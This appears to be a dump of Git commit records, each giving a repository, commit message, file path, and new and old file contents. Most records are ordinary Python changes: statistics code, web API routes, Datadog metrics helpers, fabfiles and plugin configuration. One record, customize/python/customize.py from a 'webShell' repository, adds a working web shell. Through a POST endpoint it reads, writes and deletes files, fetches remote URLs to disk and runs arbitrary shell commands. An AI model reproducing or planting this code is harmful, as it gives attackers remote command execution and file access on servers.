# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from numpy import reshape, zeros
class MCMC(object):
def __init__(self, data, strategy):
self.data = data
self.strategy = strategy
self.simulations = None
def summary(self):
smry = ""
return smry
def define_parameters(self):
return self.strategy.define_parameters()
def initial_value(self,parameter_name):
return self.strategy.initial_value(parameter_name)
def distribution_parameters(self, parameter_name):
return self.strategy.distribution_parameters(parameter_name) # returns a dictionary
def generate(self, parameter_name):
return self.strategy.generate(parameter_name)
def output(self, burn, parameter_name):
return self.strategy.output(self.simulations, burn, parameter_name)
def run(self, number_simulations=100):
self.simulations = {key : zeros((param.size[0],param.size[1],number_simulations)) for (key, param) in self.strategy.parameters.list.items()}
for name in self.strategy.parameters.hierarchy:
self.strategy.parameters.list[name].current_value = self.initial_value(name)
for i in range(number_simulations):
print("== step %i ==" % (int(i+1),))
#restart_step = True
#while restart_step:
for name in self.strategy.parameters.hierarchy:
print("== parameter %s ==" % name)
#try:
self.strategy.parameters.list[name].current_value = self.generate(name)
self.simulations[name][:,:,i] = self.strategy.parameters.list[name].current_value.reshape(self.strategy.parameters.list[name].size)
#restart_step = False
#except:
# print("== restart step %i ==" % i)
# restart_step = True
# break
| mit | Python |
e5bd79a2cb80c18662a85b0fcb63b7dd8812a9ea | set var collection name on connection api | chrisdamba/mining,mining/mining,avelino/mining,seagoat/mining,mlgruby/mining,AndrzejR/mining,jgabriellima/mining,mlgruby/mining,chrisdamba/mining,avelino/mining,seagoat/mining,mining/mining,mlgruby/mining,AndrzejR/mining,jgabriellima/mining | controllers/api/connection.py | controllers/api/connection.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from .base import get, post, put, delete
ADMIN_BUCKET_NAME = 'openminig-admin'
collection = 'connection'
connection_app = Bottle()
mongo = MongoPlugin(uri="mongodb://127.0.0.1", db=ADMIN_BUCKET_NAME,
json_mongo=True)
connection_app.install(mongo)
@connection_app.route('/', method='GET')
@connection_app.route('/:slug', method='GET')
def connection_get(mongodb, slug=None):
return get(mongodb, collection, slug)
@connection_app.route('/', method='POST')
def connection_post(mongodb, slug=None):
return post(mongodb, collection)
@connection_app.route('/:slug', method='PUT')
def connection_put(mongodb, slug=None):
return put(mongodb, collection, slug)
@connection_app.route('/:slug', method='DELETE')
def connection_delete(mongodb, slug=None):
return delete(mongodb, collection, slug)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from .base import get, post, put, delete
ADMIN_BUCKET_NAME = 'openminig-admin'
connection_app = Bottle()
mongo = MongoPlugin(uri="mongodb://127.0.0.1", db=ADMIN_BUCKET_NAME,
json_mongo=True)
connection_app.install(mongo)
@connection_app.route('/', method='GET')
@connection_app.route('/:slug', method='GET')
def connection_get(mongodb, slug=None):
return get(mongodb, 'connection', slug)
@connection_app.route('/', method='POST')
def connection_post(mongodb, slug=None):
return post(mongodb, 'connection')
@connection_app.route('/:slug', method='PUT')
def connection_put(mongodb, slug=None):
return put(mongodb, 'connection', slug)
@connection_app.route('/:slug', method='DELETE')
def connection_delete(mongodb, slug=None):
return delete(mongodb, 'connection', slug)
| mit | Python |
81e0a52f40d2a706ff5f7a347af48637f1b439f6 | revert _case_blocks functionality in reportxform pillow | qedsoftware/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,puttarajubr/commcare-hq,gmimano/commcaretest,puttarajubr/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,gmimano/commcaretest,gmimano/commcaretest,dimagi/commcare-hq,SEL-Columbia/commcare-hq,qedsoftware/commcare-hq | corehq/pillows/reportxform.py | corehq/pillows/reportxform.py | import copy
from django.conf import settings
from casexml.apps.case.xform import extract_case_blocks
from corehq.pillows.base import convert_property_dict
from .mappings.reportxform_mapping import REPORT_XFORM_INDEX, REPORT_XFORM_MAPPING
from .xform import XFormPillow
COMPUTED_CASEBLOCKS_KEY = '_case_blocks'
class ReportXFormPillow(XFormPillow):
"""
an extension to XFormPillow that provides for indexing of arbitrary data fields
within the xform
"""
es_index_prefix = "report_xforms"
es_alias = "report_xforms"
es_type = "report_xform"
es_index = REPORT_XFORM_INDEX
#type level mapping
default_mapping = REPORT_XFORM_MAPPING
def change_transform(self, doc_dict):
doc_ret = super(ReportXFormPillow, self).change_transform(doc_dict)
if doc_ret:
domain = self.get_domain(doc_dict)
if domain not in getattr(settings, 'ES_XFORM_FULL_INDEX_DOMAINS', []):
#full indexing is only enabled for select domains on an opt-in basis
return None
convert_property_dict(doc_ret['form'], self.default_mapping['properties']['form'], override_root_keys=['case'])
return doc_ret
else:
return None
| from django.conf import settings
from corehq.pillows.base import convert_property_dict
from .mappings.reportxform_mapping import REPORT_XFORM_INDEX, REPORT_XFORM_MAPPING
from .xform import XFormPillow
class ReportXFormPillow(XFormPillow):
"""
an extension to XFormPillow that provides for indexing of arbitrary data fields
within the xform
"""
es_index_prefix = "report_xforms"
es_alias = "report_xforms"
es_type = "report_xform"
es_index = REPORT_XFORM_INDEX
#type level mapping
default_mapping = REPORT_XFORM_MAPPING
def change_transform(self, doc_dict):
doc_ret = super(ReportXFormPillow, self).change_transform(doc_dict)
if doc_ret:
domain = self.get_domain(doc_dict)
if domain not in getattr(settings, 'ES_XFORM_FULL_INDEX_DOMAINS', []):
#full indexing is only enabled for select domains on an opt-in basis
return None
#after basic transforms for stupid type mistakes are done, walk all properties.
convert_property_dict(doc_ret['form'], self.default_mapping['properties']['form'], override_root_keys=['case'])
return doc_ret
else:
return None
| bsd-3-clause | Python |
16eeb4ea9bda060389dac5c52903a7a8804c690b | add docstrings | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/util/datadog/gauges.py | corehq/util/datadog/gauges.py | from functools import wraps
from celery.task import periodic_task
from corehq.util.datadog import statsd, datadog_logger
from corehq.util.soft_assert import soft_assert
def datadog_gauge_task(name, fn, run_every, enforce_prefix='commcare'):
"""
helper for easily registering datadog gauges to run periodically
To update a datadog gauge on a schedule based on the result of a function
just add to your app's tasks.py:
my_calculation = datadog_gauge_task('my.datadog.metric', my_calculation_function,
run_every=crontab(minute=0))
"""
_enforce_prefix(name, enforce_prefix)
datadog_gauge = _DatadogGauge(name, fn, run_every)
return datadog_gauge.periodic_task()
def datadog_histogram(name, value, enforce_prefix='commcare', tags=None):
"""
Usage: Used to track the statistical distribution of a set of values over a statsd flush period.
Actually submits as multiple metrics:
"""
_datadog_record(statsd.histogram, name, value, enforce_prefix, tags)
def datadog_gauge(name, value, enforce_prefix='commcare', tags=None):
"""
Stored as a GAUGE type in the datadog web application. Each value in the stored timeseries
is the last gauge value submitted for that metric during the statsd flush period.
"""
_datadog_record(statsd.gauge, name, value, enforce_prefix, tags)
def datadog_counter(name, value=1, enforce_prefix='commcare', tags=None):
"""
Usage: Used to increment a counter of events.
Stored as a RATE type in the datadog web application. Each value in the stored timeseries
is a time-normalized delta of the counter's value over that statsd flush period.
"""
_datadog_record(statsd.increment, name, value, enforce_prefix, tags)
def _datadog_record(fn, name, value, enforce_prefix='commcare', tags=None):
_enforce_prefix(name, enforce_prefix)
try:
fn(name, value, tags=tags)
except Exception:
datadog_logger.exception('Unable to record Datadog stats')
class _DatadogGauge(object):
def __init__(self, name, fn, run_every):
self.name = name
self.fn = fn
self.run_every = run_every
def periodic_task(self):
@periodic_task('background_queue', run_every=self.run_every,
acks_late=True, ignore_result=True)
@wraps(self.fn)
def inner(*args, **kwargs):
statsd.gauge(self.name, self.fn(*args, **kwargs))
return inner
def _enforce_prefix(name, prefix):
soft_assert(fail_if_debug=True).call(
not prefix or name.split('.')[0] == prefix,
"Did you mean to call your gauge 'commcare.{}'? "
"If you're sure you want to forgo the prefix, you can "
"pass enforce_prefix=None".format(name))
| from functools import wraps
from celery.task import periodic_task
from corehq.util.datadog import statsd, datadog_logger
from corehq.util.soft_assert import soft_assert
def datadog_gauge_task(name, fn, run_every, enforce_prefix='commcare'):
"""
helper for easily registering datadog gauges to run periodically
To update a datadog gauge on a schedule based on the result of a function
just add to your app's tasks.py:
my_calculation = datadog_gauge_task('my.datadog.metric', my_calculation_function,
run_every=crontab(minute=0))
"""
_enforce_prefix(name, enforce_prefix)
datadog_gauge = _DatadogGauge(name, fn, run_every)
return datadog_gauge.periodic_task()
def datadog_histogram(name, value, enforce_prefix='commcare', tags=None):
"""
Usage: Used to track the statistical distribution of a set of values over a statsd flush period.
Actually submits as multiple metrics:
"""
_datadog_record(statsd.histogram, name, value, enforce_prefix, tags)
def datadog_gauge(name, value, enforce_prefix='commcare', tags=None):
_datadog_record(statsd.gauge, name, value, enforce_prefix, tags)
def datadog_counter(name, value=1, enforce_prefix='commcare', tags=None):
_datadog_record(statsd.increment, name, value, enforce_prefix, tags)
def _datadog_record(fn, name, value, enforce_prefix='commcare', tags=None):
_enforce_prefix(name, enforce_prefix)
try:
fn(name, value, tags=tags)
except Exception:
datadog_logger.exception('Unable to record Datadog stats')
class _DatadogGauge(object):
def __init__(self, name, fn, run_every):
self.name = name
self.fn = fn
self.run_every = run_every
def periodic_task(self):
@periodic_task('background_queue', run_every=self.run_every,
acks_late=True, ignore_result=True)
@wraps(self.fn)
def inner(*args, **kwargs):
statsd.gauge(self.name, self.fn(*args, **kwargs))
return inner
def _enforce_prefix(name, prefix):
soft_assert(fail_if_debug=True).call(
not prefix or name.split('.')[0] == prefix,
"Did you mean to call your gauge 'commcare.{}'? "
"If you're sure you want to forgo the prefix, you can "
"pass enforce_prefix=None".format(name))
| bsd-3-clause | Python |
547f92524913f4d01094ff000ba3e3fe9d7b68a8 | Update customize.py | ayiis/webShell,ayiis/webShell | customize/python/customize.py | customize/python/customize.py | # -*- coding:utf-8 -*-
import urllib
import os
import shutil
import time
import datetime
def getDirInfo(path):
ret = {
'f': [],
'd': [],
}
pList = os.listdir(path)
for p in pList:
pp = path + p
mtime = time.localtime(os.stat(pp).st_mtime)
mtime = time.strftime('%Y-%m-%d %H:%M:%S', mtime)
if os.path.isfile(pp):
ret['f'].append(p + '\t' + mtime + '\t' + str(os.path.getsize(pp)) + '\t-\n')
else:
ret['d'].append(p + '/\t' + mtime + '\t0\t-\n')
return ret
def main(req):
Z = req['z']
encoding = req['z0']
Z1 = req['z1']
Z2 = req['z2']
Ret = '1'
if Z == 'A':
disk_list = list('abcdefghijklmnopqrstuvwxyz')
exist_disk = ':'.join(filter(lambda x: os.path.isdir(x + ':'), disk_list)) + ':'
return os.getcwd() + '\t' + exist_disk
elif Z == 'B':
Ret = ''
dirinfo = getDirInfo(Z1)
if len(dirinfo['d']) > 0:
dirinfo['d'].sort(lambda a, b: 1 if a.upper() > b.upper() else -1)
Ret += ''.join(dirinfo['d'])
if len(dirinfo['f']) > 0:
dirinfo['f'].sort(lambda a, b: 1 if a.upper() > b.upper() else -1)
Ret += ''.join(dirinfo['f'])
elif Z == 'C':
fileHandle = open(Z1)
Ret = fileHandle.read()
fileHandle.close()
elif Z == 'D':
fileHandle = open(Z1, 'w')
fileHandle.write(Z2)
fileHandle.close()
elif Z == 'E':
if os.path.isfile(Z1):
os.remove(Z1)
else:
shutil.rmtree(Z1)
elif Z == 'F':
fileHandle = open(Z1, 'rb')
Ret = fileHandle.read()
fileHandle.close()
elif Z == 'G':
fileHandle = open(Z1, 'wb')
fileHandle.write(Z2.decode('hex'))
fileHandle.close()
elif Z == 'H':
shutil.copyfile(Z1, Z2)
elif Z == 'I':
dirname = Z1[:Z1.rfind('\\') + 1]
os.chdir(dirname) # change working dir
os.rename(Z1[Z1.rfind('\\') + 1:], Z2[Z2.rfind('\\') + 1:])
elif Z == 'J':
if os.path.exists(Z1) == False:
os.mkdir(Z1)
elif Z == 'K':
TM = datetime.datetime.strptime(Z2, '%Y-%m-%d %H:%M:%S')
TM = time.mktime(TM.timetuple())
os.utime(Z1, (TM, TM))
elif Z == 'L':
urllib.urlretrieve(Z1, Z2)
elif Z == 'M':
os.popen('chcp 437 >nul&chcp 65001 >nul')
cmd = ' '.join([Z1[2:], Z1[0:2], Z2])
Ret = os.popen(cmd).read()
os.popen('chcp 437')
return Ret
def do(req):
ret = main(req)
ret = '\x2D\x3E\x7C' + str(ret or 1) + '\x7C\x3C\x2D'
return ret
#
# TEST #
#
from flask import request
app.add_url_rule('/customize', 'customize', routes.customize.api, methods=['POST'])
def api():
req_data = {
'z': request.form.get('z'),
'z0': request.form.get('z0'),
'z1': request.form.get('z1'),
'z2': request.form.get('z2'),
}
return do(req_data)
| #
| mit | Python |
2d42e22a2fc6873821d61a63b14c66ff0a9fed3e | Remove test code. | wireservice/agate,onyxfish/agate,JoeGermuska/agate,onyxfish/journalism,flother/agate | example.py | example.py | #!/usr/bin/env python
import agate
tester = agate.TypeTester(force={
'fips': agate.Text()
})
table = agate.Table.from_csv('examples/realdata/ks_1033_data.csv', column_types=tester)
# Question 1: What was the total cost to Kansas City area counties?
# Filter to counties containing Kansas City
kansas_city = table.where(lambda r: r['county'] in ('JACKSON', 'CLAY', 'CASS', 'PLATTE'))
# Sum total_cost of four counties
print('Total for Kansas City area: %i' % kansas_city.aggregate(agate.Sum('total_cost')))
# Question 2: Which counties spent the most?
# Group by counties
counties = table.group_by('county')
# Aggregate totals for all counties
totals = counties.aggregate([
('total_cost_sum', agate.Sum('total_cost'))
])
totals = totals.order_by('total_cost_sum', reverse=True)
totals.limit(20).print_bars('county', 'total_cost_sum', width=80)
print('Five most spendy counties:')
totals.print_table(5)
# Question 3: What are the most recent purchases?
recent = table.order_by('ship_date', reverse=True)
print('Five most recent purchases:')
recent.print_table(5, 5)
# Question 4: What is the standard of deviation of the cost of all purchases?
stdev = table.aggregate(agate.StDev('total_cost'))
print('Standard deviation of total_cost: %.2f' % stdev)
# Question 5: How many robots were purchased?
robots = table.where(lambda r: 'ROBOT' in (r['item_name'] or [])).aggregate(agate.Sum('quantity'))
print('Number of robots purchased: %i' % robots)
| #!/usr/bin/env python
import agate
tester = agate.TypeTester(force={
'fips': agate.Text()
})
table = agate.Table.from_csv('examples/realdata/ks_1033_data.csv', column_types=tester)
a = table.pivot('county', computation=agate.Percent('pivot'))
a.print_table(max_rows=10)
import sys
sys.exit()
# Question 1: What was the total cost to Kansas City area counties?
# Filter to counties containing Kansas City
kansas_city = table.where(lambda r: r['county'] in ('JACKSON', 'CLAY', 'CASS', 'PLATTE'))
# Sum total_cost of four counties
print('Total for Kansas City area: %i' % kansas_city.aggregate(agate.Sum('total_cost')))
# Question 2: Which counties spent the most?
# Group by counties
counties = table.group_by('county')
# Aggregate totals for all counties
totals = counties.aggregate([
('total_cost_sum', agate.Sum('total_cost'))
])
totals = totals.order_by('total_cost_sum', reverse=True)
totals.limit(20).print_bars('county', 'total_cost_sum', width=80)
print('Five most spendy counties:')
totals.print_table(5)
# Question 3: What are the most recent purchases?
recent = table.order_by('ship_date', reverse=True)
print('Five most recent purchases:')
recent.print_table(5, 5)
# Question 4: What is the standard of deviation of the cost of all purchases?
stdev = table.aggregate(agate.StDev('total_cost'))
print('Standard deviation of total_cost: %.2f' % stdev)
# Question 5: How many robots were purchased?
robots = table.where(lambda r: 'ROBOT' in (r['item_name'] or [])).aggregate(agate.Sum('quantity'))
print('Number of robots purchased: %i' % robots)
| mit | Python |
4b5147ca4659ced9173033c5d1b9b09aa173073b | fix example.py | ashbc/pybreak | example.py | example.py | from cards import Ice, Breaker
# Example implementation for funky cards
# Subclassing would be better and would allow for grouping of similar effects
# (eg breakers that break "up to X" subroutines rather than exactly X
# (which actually turns out to be the case for most multi-sub breakers).
# this has a certain interaction with so-called "optional" subroutines.)
# another, better, simpler, example might be advanceable ice :P
# http://i.imgur.com/vxB2kXD.png
icet = Ice()
icet.subtype = ('Barrier', 'Tracer')
icet.name = 'Ice-T'
# rather than subclass and add an "advancements" field here's a hack
icet_advancements = 0
# X strength
icet.strength = lambda *args: icet_advancements
# X rez cost
icet.rez_cost = lambda *args: icet_advancements
# X subroutines (with trace x)
icet.subroutine_count = lambda *args: icet_advancements
# note that these *args are a lazy way of circumventing the expected format,
# because we don't care about anything except this hack variable.
# The correct form would be lambda self, breaker
bread = Breaker()
bread.name = "Gingerbread"
bread.subtype = ('Icebreaker')
bread.target_subtype = ('Tracer')
bread.boost_cost = 2
bread.boost_amount = 3
bread.break_cost = 1
bread.break_amount = 1
bread.strength = 2
while icet_advancements < 7:
icet_advancements += 1
print("Gingerbread breaks a {}-advanced Ice-T for {} credits.".format(icet_advancements, bread.break_ice(icet)))
|
# Example implementation for funky cards
# Subclassing would be better and would allow for grouping of similar effects
# (eg breakers that break "up to X" subroutines rather than exactly X
# (which actually turns out to be the case for most multi-sub breakers).
# this has a certain interaction with so-called "optional" subroutines.)
# another, better, simpler, example might be advanceable ice :P
# http://i.imgur.com/vxB2kXD.png
icet = Ice()
icet.subtype = ('Barrier', 'Tracer')
icet.name = 'Ice-T'
# rather than subclass and add an "advancements" field here's a hack
icet_advancements = 4
# X strength
icet.strength = lambda *args: icet_advancements
# X rez cost
icet.rez_cost = lambda *args: icet_advancements
# X subroutines (with trace x)
icet.subroutine_count = lambda *args: icet_advancements
# note that these *args are a lazy way of circumventing the expected format,
# because we don't care about anything except this hack variable.
# The correct form would be lambda self, breaker
bread = Breaker()
bread.name = "Gingerbread"
bread.subtype = ('Icebreaker')
bread.target_subtype = ('Tracer')
bread.boost_cost = 2
bread.boost_amount = 3
bread.break_cost = 1
bread.break_amount = 1
bread.strength = 2
print(
"Gingerbread breaks a {}-advanced Ice-T for {} credits.".format(
icet_advancements, bread.break_ice(icet)))
| isc | Python |
a74e91613be376d6d71fb90c15cab689af661e37 | Add __getattr__ method in order to be able to call non-defined methods | mdsrosa/money-conversion-py | money_conversion/money.py | money_conversion/money.py | from currency_rates import rates
class Money(object):
def __init__(self, amount, currency):
self.amount = amount
self.currency = currency.upper()
def __repr__(self):
return "%.2f %s" % (self.amount, self.currency)
def __getattr__(self, currency):
def convert():
return self.to_currency(currency)
return convert
def to_currency(self, currency):
currency = currency.split('_')[1].upper()
amount = self.amount
base_currency_rates = rates.get(self.currency)
new_amount = amount * base_currency_rates.get(currency)
return Money(new_amount, currency)
| from currency_rates import rates
class Money(object):
def __init__(self, amount, currency):
self.amount = amount
self.currency = currency.upper()
def __repr__(self):
return "%.2f %s" % (self.amount, self.currency)
def to_currency(self, new_currency):
new_currency = new_currency.split('_')[1].upper()
amount = self.amount
base_currency_rates = rates.get(self.currency)
new_amount = amount * base_currency_rates.get(new_currency)
return Money(new_amount, new_currency)
| mit | Python |
67afd6a7808e2d63809d08537d733c1fe740918b | Change the description | vnc-biz/openerp-server,xrg/openerp-server,MarkusTeufelberger/openobject-server,gisce/openobject-server,gisce/openobject-server,gisce/openobject-server,ovnicraft/openerp-server,MarkusTeufelberger/openobject-server,MarkusTeufelberger/openobject-server,xrg/openerp-server,splbio/openobject-server,splbio/openobject-server,ovnicraft/openerp-server,splbio/openobject-server,vnc-biz/openerp-server | bin/release.py | bin/release.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
name = 'openerp-server'
version = '5.0.0_rc2'
major_version = '5.0'
description = 'OpenERP Server'
long_desc = '''\
OpenERP is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and XML-RPC interfaces.
'''
classifiers = """\
Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU General Public License Version 3 (GPL-3)
Programming Language :: Python
"""
url = 'http://www.openerp.com'
author = 'Tiny.be'
author_email = 'info@tiny.be'
support_email = 'support@openerp.com'
license = 'GPL-3'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
name = 'openerp-server'
version = '5.0.0_rc2'
major_version = '5.0'
description = 'OpenERP Server'
long_desc = '''\
OpenERP is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and SOAP and XML-RPC interfaces.
'''
classifiers = """\
Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU General Public License Version 3 (GPL-3)
Programming Language :: Python
"""
url = 'http://www.openerp.com'
author = 'Tiny.be'
author_email = 'info@tiny.be'
support_email = 'support@openerp.com'
license = 'GPL-3'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
20b757c31564be88a4e574661af72cbf57487858 | remove reference to celery in fabric file | Lancey6/woodwind,Lancey6/woodwind | fabfile.py | fabfile.py | from fabric.api import local, prefix, cd, run, env, lcd, sudo
env.hosts = ['orin.kylewm.com']
REMOTE_PATH = '/srv/www/kylewm.com/woodwind'
def commit():
local("git add -p")
local("git diff-index --quiet HEAD || git commit")
def push():
local("git push origin master")
def pull():
with cd(REMOTE_PATH):
run("git pull origin master")
run("git submodule update")
def push_remote():
with cd(REMOTE_PATH):
run("git add -p")
run("git diff-index --quiet HEAD || git commit")
run("git push origin master")
def restart():
with cd(REMOTE_PATH):
with prefix("source venv/bin/activate"):
run("pip install --upgrade -r requirements.txt")
sudo("restart woodwind")
sudo("restart woodwind-tornado")
def deploy():
commit()
push()
pull()
restart()
| from fabric.api import local, prefix, cd, run, env, lcd, sudo
env.hosts = ['orin.kylewm.com']
REMOTE_PATH = '/srv/www/kylewm.com/woodwind'
def commit():
local("git add -p")
local("git diff-index --quiet HEAD || git commit")
def push():
local("git push origin master")
def pull():
with cd(REMOTE_PATH):
run("git pull origin master")
run("git submodule update")
def push_remote():
with cd(REMOTE_PATH):
run("git add -p")
run("git diff-index --quiet HEAD || git commit")
run("git push origin master")
def restart():
with cd(REMOTE_PATH):
with prefix("source venv/bin/activate"):
run("pip install --upgrade -r requirements.txt")
sudo("restart woodwind")
sudo("restart woodwind-celery")
sudo("restart woodwind-tornado")
def deploy():
commit()
push()
pull()
restart()
| bsd-2-clause | Python |
9d8e5daf88affc2d766229602067a478f105b496 | add missing import | renalreg/radar-client,renalreg/radar-client,renalreg/radar-client | fabfile.py | fabfile.py | import binascii
import os
import re
from pkg_resources import parse_version
from fabric.api import task, put, run, cd
@task
def deploy(archive=None, name='radar-client'):
if archive is None:
archive = sorted(filter(lambda x: x.endswith('.tar.gz'), os.listdir('.')), key=parse_version)[-1]
version = re.search('-([^-]+)\.tar\.gz$', archive).group(1)
current_version = '/srv/{name}/current'.format(name=name)
new_version = '/srv/{name}/{version}'.format(name=name, version=version)
randomstr = binascii.hexlify(os.urandom(20)).decode('utf-8')
tmp = '/tmp/radar-client-{0}'.format(randomstr)
run('mkdir {0}'.format(tmp))
remote_archive = '{0}/radar-client.tar.gz'.format(tmp)
put(archive, remote_archive)
run('rm -rf {0} && mkdir -p {0}'.format(new_version))
with cd(new_version):
run('tar --strip-components=1 -xzf {}'.format(remote_archive))
run('ln -sfn {0} {1}'.format(new_version, current_version))
run('rm -rf {0}'.format(tmp))
| import os
import re
from pkg_resources import parse_version
from fabric.api import task, put, run, cd
@task
def deploy(archive=None, name='radar-client'):
if archive is None:
archive = sorted(filter(lambda x: x.endswith('.tar.gz'), os.listdir('.')), key=parse_version)[-1]
version = re.search('-([^-]+)\.tar\.gz$', archive).group(1)
current_version = '/srv/{name}/current'.format(name=name)
new_version = '/srv/{name}/{version}'.format(name=name, version=version)
randomstr = binascii.hexlify(os.urandom(20)).decode('utf-8')
tmp = '/tmp/radar-client-{0}'.format(randomstr)
run('mkdir {0}'.format(tmp))
remote_archive = '{0}/radar-client.tar.gz'.format(tmp)
put(archive, remote_archive)
run('rm -rf {0} && mkdir -p {0}'.format(new_version))
with cd(new_version):
run('tar --strip-components=1 -xzf {}'.format(remote_archive))
run('ln -sfn {0} {1}'.format(new_version, current_version))
run('rm -rf {0}'.format(tmp))
| agpl-3.0 | Python |
0d9c81996e436f5f717801e8abdd6c12e9c39084 | Update fabfile | explosion/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc | fabfile.py | fabfile.py | from fabric.api import task, local, run, lcd, cd, env
from os.path import exists as file_exists
from fabtools.python import virtualenv
from os import path
PWD = path.dirname(__file__)
VENV_DIR = path.join(PWD, '.env')
#def dev():
# # Allow this to persist, since we aren't as rigorous about keeping state clean
# if not file_exists('.denv'):
# local('virtualenv .denv')
#
# with virtualenv(DEV_ENV_DIR):
# local('pip install -r requirements.txt')
@task
def sdist():
if file_exists('dist/'):
local('rm -rf dist/')
local('mkdir dist')
with virtualenv(VENV_DIR):
local('python setup.py sdist')
@task
def publish(version):
with virtualenv(VENV_DIR):
local('git push origin master')
local('git tag -a %s' % version)
local('git push origin %s' % version)
local('python setup.py sdist')
local('python setup.py register')
local('twine upload dist/*.tar.gz')
@task
def env():
if file_exists('.env'):
local('rm -rf .env')
local('virtualenv .env')
local('pip install -r requirements.txt')
@task
def install():
with virtualenv(VENV_DIR):
local('pip install --upgrade setuptools')
local('pip install dist/*.tar.gz')
local('pip install pytest')
@task
def make():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python setup.py build_ext --inplace')
@task
def clean():
with lcd(path.dirname(__file__)):
local('python setup.py clean --all')
@task
def test():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python -m pytest -x thinc')
| from fabric.api import local, run, lcd, cd, env
from os.path import exists as file_exists
from fabtools.python import virtualenv
from os import path
PWD = path.dirname(__file__)
VENV_DIR = path.join(PWD, '.env')
DEV_ENV_DIR = path.join(PWD, '.denv')
def dev():
# Allow this to persist, since we aren't as rigorous about keeping state clean
if not file_exists('.denv'):
local('virtualenv .denv')
with virtualenv(DEV_ENV_DIR):
local('pip install -r requirements.txt')
def sdist():
if file_exists('dist/'):
local('rm -rf dist/')
local('mkdir dist')
with virtualenv(VENV_DIR):
local('python setup.py sdist')
def publish(version):
with virtualenv(VENV_DIR):
local('git push origin master')
local('git tag -a %s' % version)
local('git push origin %s' % version)
local('python setup.py sdist')
local('python setup.py register')
local('twine upload dist/*.tar.gz')
def setup():
if file_exists('.env'):
local('rm -rf .env')
local('virtualenv .env')
def install():
with virtualenv(VENV_DIR):
local('pip install --upgrade setuptools')
local('pip install dist/*.tar.gz')
local('pip install pytest')
def make():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python setup.py build_ext --inplace')
def clean():
with lcd(path.dirname(__file__)):
local('python setup.py clean --all')
def test():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python -m pytest -x thinc')
def travis():
local('open https://travis-ci.org/spacy-io/thinc')
| mit | Python |
34e7b2503f2dbd99e0a61e9fc2fa6cac8a3a69e8 | Hide qualimap's median coverage (avg. cov is reported by bcbio) | vladsaveliev/MultiQC_bcbio,MultiQC/MultiQC_bcbio,lpantano/MultiQC_bcbio | multiqc_bcbio/__init__.py | multiqc_bcbio/__init__.py | from __future__ import absolute_import
from .bcbio import MultiqcModule
from multiqc import config
# Add search patterns and config options for the things that are used in MultiQC_bcbio
def multiqc_bcbio_config():
""" Set up MultiQC config defaults for this package """
bcbio_search_patterns = {
'bcbio/metrics': {'fn': '*_bcbio.txt'},
'bcbio/coverage': {'fn': '*_bcbio_coverage.txt'},
'bcbio/coverage_avg': {'fn': '*_bcbio_coverage_avg.txt'},
'bcbio/variants': {'fn': '*_bcbio_variants.txt'},
'bcbio/target': {'fn': 'target_info.yaml'},
'bcbio/qsignature': {'fn': '*bcbio_qsignature.ma'},
'bcbio/vcfstats': {'fn': '*_bcbio_variants_stats.txt'},
'bcbio/seqbuster': {'contents': 'seqbuster'},
'bcbio/umi': {'fn': '*_umi_stats.yaml'},
'bcbio/viral': {'fn': '*viral*-counts.txt'},
'bcbio/damage': {'fn': '*damage.yaml'},
}
config.update_dict(config.sp, bcbio_search_patterns)
